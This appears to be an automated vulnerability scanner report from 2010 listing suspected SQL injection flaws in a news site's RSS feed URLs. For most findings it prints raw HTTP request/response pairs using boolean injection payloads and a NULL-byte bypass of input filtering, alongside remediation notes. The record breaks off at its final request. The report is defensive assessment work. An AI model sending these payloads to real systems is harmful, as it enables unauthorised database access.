Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d1--%20/568/200946.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:30 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d2--%20/568/200946.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:31 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200950.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:22:49 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200950.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:49 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 84008678'%20or%201%3d1--%20 and 84008678'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d1--%20/568/200952.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:46 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d2--%20/568/200952.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:46 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:22:48 GMT Date: Tue, 07 Dec 2010 23:22:48 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:48 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200956.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:48 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200956.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:48 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200957.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:22:44 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200957.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:44 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15133132%20or%201%3d1--%20 and 15133132%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d1--%20/200957.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:48 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d2--%20/200957.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:48 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 14002997'%20or%201%3d1--%20 and 14002997'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56814002997'%20or%201%3d1--%20/200960.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56814002997'%20or%201%3d2--%20/200960.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:58 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20696714'%20or%201%3d1--%20 and 20696714'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi20696714'%20or%201%3d1--%20/rss/CustomRssServlet/568/203708.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:19:18 GMT Date: Tue, 07 Dec 2010 23:19:18 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi20696714'%20or%201%3d2--%20/rss/CustomRssServlet/568/203708.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/203708.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:19:28 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/203708.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:28 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15372256'%20or%201%3d1--%20 and 15372256'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d1--%20/568/210701.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:03 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d2--%20/568/210701.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:04 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/214511.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:50 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/214511.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
